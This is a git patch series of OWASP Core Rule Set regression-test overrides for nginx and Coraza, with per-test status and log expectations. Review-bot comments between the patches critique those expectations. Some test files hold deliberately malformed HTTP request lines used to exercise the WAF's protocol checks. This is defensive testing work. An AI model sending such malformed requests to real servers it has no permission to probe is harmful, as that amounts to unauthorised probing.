From 47a97c18cebb2e0a1fe741041d54d3744e533ee2 Mon Sep 17 00:00:00 2001
From: Max Leske
Date: Thu, 9 Nov 2023 10:00:35 +0100
Subject: [PATCH 01/18] feat: add test overrides for nginx
---
 tests/regression/nginx-overrides.yaml | 205 ++++++++++++++++++++++++++
 1 file changed, 205 insertions(+)
 create mode 100644 tests/regression/nginx-overrides.yaml
diff --git a/tests/regression/nginx-overrides.yaml b/tests/regression/nginx-overrides.yaml
new file mode 100644
index 000000000..13d0349c2
--- /dev/null
+++ b/tests/regression/nginx-overrides.yaml
@@ -0,0 +1,205 @@
+version: "v0.0.0"
+meta:
+ engine: "libmodsecurity3"
+ platform: "nginx"
+ annotations:
+ - os: "Debian Bullseye"
+ - purpose: "CRS test suite"
+test_overrides:
+ - name: "920100-4"
+ reason: "Nginx returns a 400 bad request"
+ status: 400
+ expect_failure: false
+ - name: "920100-8"
+ reason: "On Apache is not allowed to put a colon in the path. Nginx, on the other hand, allows it and, in this case, returns a 404. /index.html:80?I=Like&Apples=Today#tag"
+ status: 404
+ expect_failure: false
+ - name: "920100-14"
+ reason: "Invalid request line produces a 400 Bad Request on Nginx. This prevents matching any rules."
+ expect_failure: true
+ - name: "920100-16"
+ reason: "Seems like Nginx does a normalization of the request line, and if :// is sent (without a path) the request path becomes / by default"
+ expect_failure: true
+ - name: "920181-1"
+ reason: "Nginx returns 400 if both Content-length and Transfer-Encoding chunked are present"
+ status: 400
+ - name: "920260-3"
+ reason: "IIS related vulnerability (2007)"
+ expect_failure: true
+ - name: "920270-4"
+ reason: "Header host with null byte causes Apache to error before it gets to CRS. Nginx allow this and libModSecurity correctly matches the rule"
+ expect_failure: false
+ status: 200
+ log_contains: "id \"920270\""
+ - name: "920290-4"
+ reason: "Nginx returns 400 if Host header is missing"
+ log_contains: ""
+ status: 400
+ - name: "920430-8"
+ reason:
+ expect_failure: true
+ - name: "932200-13"
+ reason:
+ expect_failure: true
+ - name: "933110-3"
+ reason:
+ expect_failure: true
+ - name: "933110-13"
+ reason:
+ expect_failure: true
+ - name: "933110-14"
+ reason:
+ expect_failure: true
+ - name: "933110-20"
+ reason:
+ expect_failure: true
+ - name: "933110-21"
+ reason:
+ expect_failure: true
+ - name: "933110-22"
+ reason:
+ expect_failure: true
+ - name: "933110-24"
+ reason:
+ expect_failure: true
+ - name: "933110-25"
+ reason:
+ expect_failure: true
+ - name: "933110-26"
+ reason:
+ expect_failure: true
+ - name: "933110-27"
+ reason:
+ expect_failure: true
+ - name: "934131-5"
+ reason:
+ expect_failure: true
+ - name: "934131-7"
+ reason:
+ expect_failure: true
+ - name: "941180-7"
+ reason:
+ expect_failure: true
+ - name: "942131-3"
+ reason:
+ expect_failure: true
+ - name: "942131-5"
+ reason:
+ expect_failure: true
+ - name: "942131-7"
+ reason:
+ expect_failure: true
+ - name: "942550-26"
+ reason:
+ expect_failure: true
+ - name: "942550-28"
+ reason:
+ expect_failure: true
+ - name: "942550-30"
+ reason:
+ expect_failure: true
+ - name: "942550-32"
+ reason:
+ expect_failure: true
+ - name: "944100-11"
+ reason:
+ expect_failure: true
+ - name: "944100-12"
+ reason:
+ expect_failure: true
+ - name: "944100-15"
+ reason:
+ expect_failure: true
+ - name: "944100-16"
+ reason:
+ expect_failure: true
+ - name: "944110-11"
+ reason:
+ expect_failure: true
+ - name: "944110-12"
+ reason:
+ expect_failure: true
+ - name: "944110-15"
+ reason:
+ expect_failure: true
+ - name: "944110-16"
+ reason:
+ expect_failure: true
+ - name: "944120-6"
+ reason:
+ expect_failure: true
+ - name: "944120-7"
+ reason:
+ expect_failure: true
+ - name: "944120-23"
+ reason:
+ expect_failure: true
+ - name: "944120-24"
+ reason:
+ expect_failure: true
+ - name: "944120-40"
+ reason:
+ expect_failure: true
+ - name: "944120-41"
+ reason:
+ expect_failure: true
+ - name: "944120-57"
+ reason:
+ expect_failure: true
+ - name: "944120-58"
+ reason:
+ expect_failure: true
+ - name: "944120-74"
+ reason:
+ expect_failure: true
+ - name: "944120-75"
+ reason:
+ expect_failure: true
+ - name: "944120-91"
+ reason:
+ expect_failure: true
+ - name: "944120-92"
+ reason:
+ expect_failure: true
+ - name: "944120-108"
+ reason:
+ expect_failure: true
+ - name: "944120-109"
+ reason:
+ expect_failure: true
+ - name: "944120-125"
+ reason:
+ expect_failure: true
+ - name: "944120-126"
+ reason:
+ expect_failure: true
+ - name: "944140-3"
+ reason:
+ expect_failure: true
+ - name: "944140-8"
+ reason:
+ expect_failure: true
+ - name: "944210-6"
+ reason:
+ expect_failure: true
+ - name: "944210-7"
+ reason:
+ expect_failure: true
+ - name: "944210-23"
+ reason:
+ expect_failure: true
+ - name: "944210-24"
+ reason:
+ expect_failure: true
+ - name: "944210-40"
+ reason:
+ expect_failure: true
+ - name: "944210-41"
+ reason:
+ expect_failure: true
+ - name: "980170-1"
+ reason:
+ expect_failure: true
+ - name: "980170-2"
+ reason:
+ expect_failure: true
From 991d3aa3c6761fa6fe483cbb803048515905c4b3 Mon Sep 17 00:00:00 2001
From: Max Leske
Date: Thu, 9 Nov 2023 16:34:55 +0100
Subject: [PATCH 02/18] feat: update schema
---
 tests/regression/nginx-overrides.yaml | 211 +++++++++++++++++---------
 1 file changed, 140 insertions(+), 71 deletions(-)
diff --git a/tests/regression/nginx-overrides.yaml b/tests/regression/nginx-overrides.yaml
index 13d0349c2..2af721efa 100644
--- a/tests/regression/nginx-overrides.yaml
+++ b/tests/regression/nginx-overrides.yaml
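Review bot: The 920290-4 override sets `log_contains: ""`, which asserts nothing about the rule if the runner does a substring match (the `log_contains: "id \"920270\""` two entries above suggests it does): an empty substring is found in any log, so the entry only pins the 400. If the point is that nginx rejects the missing Host header before CRS runs, say so with `no_log_contains: "id \"920290\""`, or drop the key. The same empty-string expectation recurs on the 933110 entries in PATCH 04 and on the coraza 920430-8 entry in PATCH 03. Every entry from 920430-8 down also has a bare `reason:`, which YAML reads as null, so the file records no justification for those expected failures; a string such as `reason: "TODO: triage"` keeps the key typed until the real reason is known.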
@@ -6,200 +6,269 @@ meta: - os: "Debian Bullseye" - purpose: "CRS test suite" test_overrides: - - name: "920100-4" + - rule_id: 920100 + test_id: 4 reason: "Nginx returns a 400 bad request" - status: 400 + output: + status: 400 expect_failure: false - - name: "920100-8" + - rule_id: 920100 + test_id: 8 reason: "On Apache is not allowed to put a colon in the path. Nginx, on the other hand, allows it and, in this case, returns a 404. /index.html:80?I=Like&Apples=Today#tag" - status: 404 + output: + status: 404 expect_failure: false - - name: "920100-14" + - rule_id: 920100 + test_id: 14 reason: "Invalid request line produces a 400 Bad Request on Nginx. This prevents matching any rules." expect_failure: true - - name: "920100-16" + - rule_id: 920100 + test_id: 16 reason: "Seems like Nginx does a normalization of the request line, and if :// is sent (without a path) the request path becomes / by default" expect_failure: true - - name: "920181-1" + - rule_id: 920181 + test_id: 1 reason: "Nginx returns 400 if both Content-length and Transfer-Encoding chunked are present" - status: 400 - - name: "920260-3" + output: + status: 400 + - rule_id: 920260 + test_id: 3 reason: "IIS related vulnerability (2007)" expect_failure: true - - name: "920270-4" + - rule_id: 920270 + test_id: 4 reason: "Header host with null byte causes Apache to error before it gets to CRS. 
Nginx allow this and libModSecurity correctly matches the rule" expect_failure: false - status: 200 - log_contains: "id \"920270\"" - - name: "920290-4" + output: + status: 200 + log_contains: "id \"920270\"" + - rule_id: 920290 + test_id: 4 reason: "Nginx returns 400 if Host header is missing" - log_contains: "" - status: 400 - - name: "920430-8" + output: + log_contains: "" + status: 400 + - rule_id: 920430 + test_id: 8 reason: expect_failure: true - - name: "932200-13" + - rule_id: 932200 + test_id: 13 reason: expect_failure: true - - name: "933110-3" + - rule_id: 933110 + test_id: 3 reason: expect_failure: true - - name: "933110-13" + - rule_id: 933110 + test_id: 13 reason: expect_failure: true - - name: "933110-14" + - rule_id: 933110 + test_id: 14 reason: expect_failure: true - - name: "933110-20" + - rule_id: 933110 + test_id: 20 reason: expect_failure: true - - name: "933110-21" + - rule_id: 933110 + test_id: 21 reason: expect_failure: true - - name: "933110-22" + - rule_id: 933110 + test_id: 22 reason: expect_failure: true - - name: "933110-24" + - rule_id: 933110 + test_id: 24 reason: expect_failure: true - - name: "933110-25" + - rule_id: 933110 + test_id: 25 reason: expect_failure: true - - name: "933110-26" + - rule_id: 933110 + test_id: 26 reason: expect_failure: true - - name: "933110-27" + - rule_id: 933110 + test_id: 27 reason: expect_failure: true - - name: "934131-5" + - rule_id: 934131 + test_id: 5 reason: expect_failure: true - - name: "934131-7" + - rule_id: 934131 + test_id: 7 reason: expect_failure: true - - name: "941180-7" + - rule_id: 941180 + test_id: 7 reason: expect_failure: true - - name: "942131-3" + - rule_id: 942131 + test_id: 3 reason: expect_failure: true - - name: "942131-5" + - rule_id: 942131 + test_id: 5 reason: expect_failure: true - - name: "942131-7" + - rule_id: 942131 + test_id: 7 reason: expect_failure: true - - name: "942550-26" + - rule_id: 942550 + test_id: 26 reason: expect_failure: true - - name: "942550-28" + - 
rule_id: 942550 + test_id: 28 reason: expect_failure: true - - name: "942550-30" + - rule_id: 942550 + test_id: 30 reason: expect_failure: true - - name: "942550-32" + - rule_id: 942550 + test_id: 32 reason: expect_failure: true - - name: "944100-11" + - rule_id: 944100 + test_id: 11 reason: expect_failure: true - - name: "944100-12" + - rule_id: 944100 + test_id: 12 reason: expect_failure: true - - name: "944100-15" + - rule_id: 944100 + test_id: 15 reason: expect_failure: true - - name: "944100-16" + - rule_id: 944100 + test_id: 16 reason: expect_failure: true - - name: "944110-11" + - rule_id: 944110 + test_id: 11 reason: expect_failure: true - - name: "944110-12" + - rule_id: 944110 + test_id: 12 reason: expect_failure: true - - name: "944110-15" + - rule_id: 944110 + test_id: 15 reason: expect_failure: true - - name: "944110-16" + - rule_id: 944110 + test_id: 16 reason: expect_failure: true - - name: "944120-6" + - rule_id: 944120 + test_id: 6 reason: expect_failure: true - - name: "944120-7" + - rule_id: 944120 + test_id: 7 reason: expect_failure: true - - name: "944120-23" + - rule_id: 944120 + test_id: 23 reason: expect_failure: true - - name: "944120-24" + - rule_id: 944120 + test_id: 24 reason: expect_failure: true - - name: "944120-40" + - rule_id: 944120 + test_id: 40 reason: expect_failure: true - - name: "944120-41" + - rule_id: 944120 + test_id: 41 reason: expect_failure: true - - name: "944120-57" + - rule_id: 944120 + test_id: 57 reason: expect_failure: true - - name: "944120-58" + - rule_id: 944120 + test_id: 58 reason: expect_failure: true - - name: "944120-74" + - rule_id: 944120 + test_id: 74 reason: expect_failure: true - - name: "944120-75" + - rule_id: 944120 + test_id: 75 reason: expect_failure: true - - name: "944120-91" + - rule_id: 944120 + test_id: 91 reason: expect_failure: true - - name: "944120-92" + - rule_id: 944120 + test_id: 92 reason: expect_failure: true - - name: "944120-108" + - rule_id: 944120 + test_id: 108 reason: 
expect_failure: true - - name: "944120-109" + - rule_id: 944120 + test_id: 109 reason: expect_failure: true - - name: "944120-125" + - rule_id: 944120 + test_id: 125 reason: expect_failure: true - - name: "944120-126" + - rule_id: 944120 + test_id: 126 reason: expect_failure: true - - name: "944140-3" + - rule_id: 944140 + test_id: 3 reason: expect_failure: true - - name: "944140-8" + - rule_id: 944140 + test_id: 8 reason: expect_failure: true - - name: "944210-6" + - rule_id: 944210 + test_id: 6 reason: expect_failure: true - - name: "944210-7" + - rule_id: 944210 + test_id: 7 reason: expect_failure: true - - name: "944210-23" + - rule_id: 944210 + test_id: 23 reason: expect_failure: true - - name: "944210-24" + - rule_id: 944210 + test_id: 24 reason: expect_failure: true - - name: "944210-40" + - rule_id: 944210 + test_id: 40 reason: expect_failure: true - - name: "944210-41" + - rule_id: 944210 + test_id: 41 reason: expect_failure: true - - name: "980170-1" + - rule_id: 980170 + test_id: 1 reason: expect_failure: true - - name: "980170-2" + - rule_id: 980170 + test_id: 2 reason: expect_failure: true From dfad9a19a6d6f6b2daed88fc5541897e62722f48 Mon Sep 17 00:00:00 2001 From: Max Leske Date: Sat, 11 Nov 2023 10:53:42 +0100 Subject: [PATCH 03/18] feat: add test overrides for Coraza --- tests/regression/coraza-overrides.yaml | 54 ++++++++++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 tests/regression/coraza-overrides.yaml diff --git a/tests/regression/coraza-overrides.yaml b/tests/regression/coraza-overrides.yaml new file mode 100644 index 000000000..f4312c010 --- /dev/null +++ b/tests/regression/coraza-overrides.yaml 
@@ -0,0 +1,54 @@
+version: "v0.0.0"
+meta:
+ engine: "coraza"
+ platform: "go"
+ annotations:
+ - purpose: "CRS test suite"
+test_overrides:
+ - rule_id: 920100
+ test_id: 4
+ reason: 'Invalid uri, Coraza not reached - 404 page not found'
+ output:
+ status: 404
+ - rule_id: 920100
+ test_id: 5
+ reason: 'Invalid uri, Coraza not reached - 404 page not found'
+ output:
+ status: 404
+ - rule_id: 920100
+ test_id: 8
+ reason: 'Go/http allows a colon in the path. Test expects status 400 or 403 (Apache behaviour)'
+ output:
+ status: 200
+ log_contains: "id:\"920100\""
+ - rule_id: 920270
+ test_id: 4
+ reason: 'Rule works, log contains 920270. Test expects status 400 (Apache behaviour)'
+ output:
+ status: 200
+ - rule_id: 920272
+ test_id: 5
+ reason: 'Rule works, log contains 920272. Test expects status 400 (Apache behaviour)'
+ output:
+ status: 200
+ - rule_id: 920290
+ test_id: 1
+ reason: 'Rule works, log contains 920290. Test expects status 400 (Apache behaviour)'
+ output:
+ status: 200
+ - rule_id: 920430
+ test_id: 8
+ reason: 'Go/http does not allow HTTP/3.0 - 505 HTTP Version Not Supported'
+ output:
+ status: 505
+ log_contains: ""
+ no_log_contains: "id:\"920430\""
+ - rule_id: 932200
+ test_id: 13
+ reason: 'wip'
+ - rule_id: 934131
+ test_id: 5
+ reason: 'TODO: check why we are failing to deobfuscate these payloads'
+ - rule_id: 934131
+ test_id: 7
+ reason: 'TODO: check why we are failing to deobfuscate these payloads'
From 54e7d0702bf447f36e87e7709e30493adf99765e Mon Sep 17 00:00:00 2001
From: theMiddle
Date: Thu, 9 Nov 2023 17:29:34 +0100
Subject: [PATCH 04/18] Update nginx-overrides.yaml
---
 tests/regression/nginx-overrides.yaml | 161 ++++++++++++++------------
 1 file changed, 90 insertions(+), 71 deletions(-)
diff --git a/tests/regression/nginx-overrides.yaml b/tests/regression/nginx-overrides.yaml
index 2af721efa..5e8f1e723 100644
--- a/tests/regression/nginx-overrides.yaml
+++ b/tests/regression/nginx-overrides.yaml
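Review bot: The last three overrides (932200-13, 934131-5 and 934131-7) carry only a `reason`, with no `output` and no `expect_failure`; unless the consumer treats an override without expectations as an expected failure — nothing on this page says it does — they change nothing and those tests keep their original verdict. If they are meant to be tolerated failures, each needs `expect_failure: true`, as the nginx file in PATCH 01 does for its counterparts. `reason: 'wip'` on 932200-13 should name the symptom or tracking issue, e.g. `reason: 'TODO: <issue or symptom>'`, since the reason is the only record of why the failure is accepted. The 920270/920272/920290 reasons say the rule matches, but those entries assert only `status: 200`; adding `log_contains: "id:\"920270\""` (same form as the 920100-8 entry) would pin that claim.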
@@ -31,10 +31,6 @@ test_overrides:
 reason: "Nginx returns 400 if both Content-length and Transfer-Encoding chunked are present"
 output:
 status: 400
- - rule_id: 920260
- test_id: 3
- reason: "IIS related vulnerability (2007)"
- expect_failure: true
 - rule_id: 920270
 test_id: 4
 reason: "Header host with null byte causes Apache to error before it gets to CRS. Nginx allow this and libModSecurity correctly matches the rule"
@@ -50,225 +46,248 @@ test_overrides: status: 400 - rule_id: 920430 test_id: 8 - reason: - expect_failure: true + reason: "If the HTTP Protocol Version is invalid, Nginx take action before modsecurity sending a 505 response code." + output: + log_contains: "" + status: 505 + expect_failure: false - rule_id: 932200 test_id: 13 - reason: + reason: "TODO: the log file contains MATCHED_VAR instead of the macro expansion result" expect_failure: true - rule_id: 933110 test_id: 3 - reason: - expect_failure: true + reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" + output: + log_contains: "" + expect_failure: false - rule_id: 933110 test_id: 13 - reason: - expect_failure: true + reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" + output: + log_contains: "" + expect_failure: false - rule_id: 933110 test_id: 14 - reason: - expect_failure: true + reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" + output: + log_contains: "" + expect_failure: false - rule_id: 933110 test_id: 20 - reason: - expect_failure: true + reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" + output: + log_contains: "" + expect_failure: false - rule_id: 933110 test_id: 21 - reason: - expect_failure: true + reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" + output: + log_contains: "" + expect_failure: false - rule_id: 933110 test_id: 22 - reason: - expect_failure: true + reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" + output: + log_contains: "" + expect_failure: false - rule_id: 933110 test_id: 24 - reason: - expect_failure: true + reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" + output: + log_contains: "" + expect_failure: false - rule_id: 933110 test_id: 25 - reason: - expect_failure: true + reason: "Nginx ignore 
by default request header with invalid characters (like X_Filename)" + output: + log_contains: "" + expect_failure: false - rule_id: 933110 test_id: 26 - reason: - expect_failure: true + reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" + output: + log_contains: "" + expect_failure: false - rule_id: 933110 test_id: 27 - reason: - expect_failure: true + reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" + output: + log_contains: "" + expect_failure: false - rule_id: 934131 test_id: 5 - reason: + reason: "The problem here is how the rules tfunc works on nginx. Waiting for a decision here: https://github.com/coreruleset/coreruleset/issues/3376" expect_failure: true - rule_id: 934131 test_id: 7 - reason: + reason: "The problem here is how the rules tfunc works on nginx. Waiting for a decision here: https://github.com/coreruleset/coreruleset/issues/3376" expect_failure: true - rule_id: 941180 test_id: 7 - reason: + reason: "Rule remove by range doesn't work on v3 if used via ctl. https://github.com/coreruleset/coreruleset/pull/3302" expect_failure: true - rule_id: 942131 test_id: 3 - reason: + reason: "v3 log bug, the first part of the chain always produces a log" expect_failure: true - rule_id: 942131 test_id: 5 - reason: + reason: "v3 log bug, the first part of the chain always produces a log" expect_failure: true - rule_id: 942131 test_id: 7 - reason: + reason: "v3 log bug, the first part of the chain always produces a log" expect_failure: true - rule_id: 942550 test_id: 26 - reason: + reason: "Seems like libmodsecurity3 cuts the substring after '?' if it contains from target `REQUEST_FILENAME`" expect_failure: true - rule_id: 942550 test_id: 28 - reason: + reason: "Seems like libmodsecurity3 cuts the substring after '?' 
if it contains from target `REQUEST_FILENAME`" expect_failure: true - rule_id: 942550 test_id: 30 - reason: + reason: "Seems like libmodsecurity3 cuts the substring after '?' if it contains from target `REQUEST_FILENAME`" expect_failure: true - rule_id: 942550 test_id: 32 - reason: + reason: "Seems like libmodsecurity3 cuts the substring after '?' if it contains from target `REQUEST_FILENAME`" expect_failure: true - rule_id: 944100 test_id: 11 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944100 test_id: 12 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944100 test_id: 15 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944100 test_id: 16 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944110 test_id: 11 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944110 test_id: 12 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944110 test_id: 15 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944110 test_id: 16 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. 
A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 6 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 7 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 23 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 24 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 40 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 41 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 57 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 58 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 74 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. 
A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 75 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 91 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 92 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 108 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 109 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 125 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944120 test_id: 126 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944140 test_id: 3 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944140 test_id: 8 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. 
A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944210 test_id: 6 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944210 test_id: 7 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944210 test_id: 23 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944210 test_id: 24 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944210 test_id: 40 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 944210 test_id: 41 - reason: + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" expect_failure: true - rule_id: 980170 test_id: 1 - reason: + reason: "libmodsecurity3 does not make any log entry about rule triggering in error.log if the rule has `noauditlog` action, like 980170" expect_failure: true - rule_id: 980170 test_id: 2 - reason: + reason: "libmodsecurity3 does not make any log entry about rule triggering in error.log if the rule has `noauditlog` action, like 980170" expect_failure: true From bfc94aa24483ab042cf6d6205085b957ddebf87b Mon Sep 17 00:00:00 2001 
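Review bot: The ten 933110 entries set `expect_failure: false` together with `output: log_contains: ""`, which asserts nothing about the rule if `log_contains` is a substring check — an empty substring is found in any log. The reason says nginx drops request headers with characters such as the underscore in `X_Filename` before CRS sees them, so the precise expectation is that 933110 does not fire, i.e. `no_log_contains: "id \"933110\""`; with that in place, an nginx configuration that starts accepting such header names, or a CRS change that starts matching, is noticed instead of passing silently. The 920430-8 entry pairs the same empty `log_contains` with `status: 505` and would benefit from the same treatment. The hunk begins before this line's chunk, at the `@@ -50,225 +46,248 @@` header.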
From: Max Leske
Date: Sat, 27 Apr 2024 14:43:19 +0200
Subject: [PATCH 05/18] chore: update tests to use single status code only
---
 .../REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml | 16 ++++++++--------
 .../REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml | 10 +++++-----
 .../REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml | 2 +-
 .../REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml | 2 +-
 .../REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml | 2 +-
 .../REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml | 2 +-
 .../REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml | 2 +-
 .../REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml | 2 +-
 .../REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml | 10 +++++-----
 9 files changed, 24 insertions(+), 24 deletions(-)
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml
index 6f26735a0..88109fb8d 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml
@@ -38,7 +38,7 @@ tests:
 uri: "/get"
 version: "HTTP/1.1"
 output:
- status: [400]
+ status: 400
 - test_title: 920100-3
 desc: Perfectly valid OPTIONS request
 stages:
@@ -70,7 +70,7 @@ tests:
 uri: "1.2.3.4:80"
 version: "HTTP/1.1"
 output:
- status: [200]
+ status: 200
 no_log_contains: "id \"920100\""
 - test_title: 920100-5
 desc: invalid Connect request, domains require ports
@@ -87,7 +87,7 @@ tests:
 uri: "www.coreruleset.org"
 version: "HTTP/1.1"
 output:
- status: [400]
+ status: 400
 - test_title: 920100-6
 desc: This is an acceptable CONNECT request for SSL tunneling
 stages:
@@ -137,7 +137,7 @@ tests:
 uri: "/get/index.html:80?I=Like&Apples=Today#tag"
 version: "HTTP/1.1"
 output:
- status: [400, 403]
+ status: 400
 - test_title: 920100-9
 desc: Normal Options request with path
 stages:
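Review bot: Collapsing a multi-status list to a single code picks the web server's own rejection over the rule's block: 920100-8 in the `@@ -137,7 +137,7 @@` hunk goes from `[400, 403]` to `400`, so the test now passes only when the server refuses the request before CRS runs and no longer accepts a 403 produced by 920100 itself. The same choice is made for the `[403, 400]` lists of 920100-11, -13 and -15, for 920160-5 (`[200, 403, 400]` → `400`, with `# log_contains: id "920160"` still commented out), and for 920270-4, 920274-1, 920280, 920290-1 and the 920430 tests in the later hunks of this patch. Where the rule is expected to match, `status: 403` together with `log_contains: "id \"920100\""` (the file's existing log format) keeps the test about CRS; where the server is known to reject first, a one-line comment like the one already on 920280 (`# Technically valid but Apache doesn't allow 0.9 anymore`) records why 400 is expected. The commit message could also state which platform the single code was taken from, since the override files on this page exist precisely because the code differs per engine.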
@@ -187,7 +187,7 @@ tests:
 uri: "\\"
 version: "HTTP/1.1"
 output:
- status: [403, 400]
+ status: 400
 - test_title: 920100-12
 desc: Invalid HTTP Request Line (920100) - Test 1 from old modsec regressions
 stages:
@@ -205,7 +205,7 @@ tests:
 uri: "/get"
 version: HTTP/1.1
 output:
- status: [400]
+ status: 400
 - test_title: 920100-13
 desc: Invalid HTTP Request Line (920100) - Test 2 from old modsec regressions
 stages:
@@ -223,7 +223,7 @@ tests:
 uri: \index.html
 version: HTTP\1.0
 output:
- status: [403, 400]
+ status: 400
 - test_title: 920100-14
 desc: Invalid HTTP Request Line (920100) - Test 3 from old modsec regressions
 stages:
@@ -257,7 +257,7 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- status: [403, 400]
+ status: 400
 - test_title: 920100-16
 desc: "Status Page Test - Invalid HTTP request line: URI has scheme and authority but no path"
 stages:
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml
index 4678ce4f9..980d2e7fd 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml
@@ -21,7 +21,7 @@ tests:
 uri: "/"
 version: "HTTP/1.1"
 output:
- status: [400]
+ status: 400
 - # Non digit content-length with content-type
 test_title: 920160-2
 stages:
@@ -39,7 +39,7 @@ tests:
 uri: "/"
 version: "HTTP/1.1"
 output:
- status: [400]
+ status: 400
 - # Mixed digit and non digit content length
